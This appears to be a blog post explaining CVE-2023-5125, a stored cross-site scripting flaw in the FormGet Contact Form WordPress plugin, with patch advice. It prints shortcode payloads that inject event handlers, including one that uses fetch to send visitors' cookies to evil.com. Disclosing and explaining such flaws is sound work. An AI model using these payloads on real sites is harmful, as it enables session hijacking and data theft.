CVE-2023-5125 - Exploiting Stored XSS in Contact Form by FormGet WordPress Plugin (up to 5.5.5)

The WordPress plugin Contact Form by FormGet is a popular choice for website owners who want an easy way to add forms to their site. Unfortunately, versions up to and including 5.5.5 are vulnerable to a serious security flaw tracked as CVE-2023-5125. This post will explain what the vulnerability is, why it matters, and how it can be exploited—with code you can see for yourself.

What Is CVE-2023-5125?

CVE-2023-5125 is a Stored Cross-Site Scripting (XSS) vulnerability in the Contact Form by FormGet plugin. This happens due to insufficient input checking and output escaping in the formget shortcode. In simple terms: the plugin doesn’t clean what is put into certain form fields, and spits it out into pages as HTML/JavaScript. That means attackers can inject their own scripts into your site.

Why It Matters

- Who can exploit it?: Anyone who can make or edit pages/posts (Contributor-level and higher users on your WordPress). If you let users post content, you’re at risk.
- What could happen?: Malicious JavaScript can run on your website visitors’ browsers. This could steal user cookies, redirect users, or deface site pages.

The core problem is that the formget shortcode lets you add forms via something like

[formget formid="123"]

But, due to the bug, if an attacker with contributor or higher privileges makes a post and injects a payload in, for example, the formid attribute, their code is not sanitized or escaped. When someone views the page, the code runs.

Suppose an attacker creates a new post with the following shortcode

[formget formid='123" onmouseover="alert(document.cookie)"']

When this shortcode is rendered, the output might look like (simplified)

<div id="formget-123" formid='123" onmouseover="alert(document.cookie)"'>
  ...form HTML...
</div>

Now, if a user hovers over the div, a JavaScript alert pops up showing their cookies.

A sneaky attacker might hide the script or steal data

[formget formid='123" style="display:none" onfocus="fetch(https://evil.com?cookie=+document.cookie)" tabindex="1']

Wait for an admin or visitor to view the page.

4. Victim’s browser runs attacker’s code because the shortcode was not sanitized/escaped.

Patch & Mitigation

Are you safe?
If your plugin is below version 5.5.6, update now!

- Update: Contact Form by FormGet on WordPress.org
- Report: Wordfence Advisory
- CVE Record: NVD - CVE-2023-5125

Conclusion

CVE-2023-5125 is a reminder that even trusted plugins can introduce serious vulnerabilities if user-generated input is not properly handled. If you use Contact Form by FormGet, make sure your site has at least version 5.5.6. Always review plugin updates and keep security top of mind!

References

- Wordfence Vulnerability Report
- Official Plugin Page
- NVD - CVE-2023-5125

Timeline

Published on: 09/23/2023 05:15:31 UTC
Last modified on: 11/07/2023 04:23:28 UTC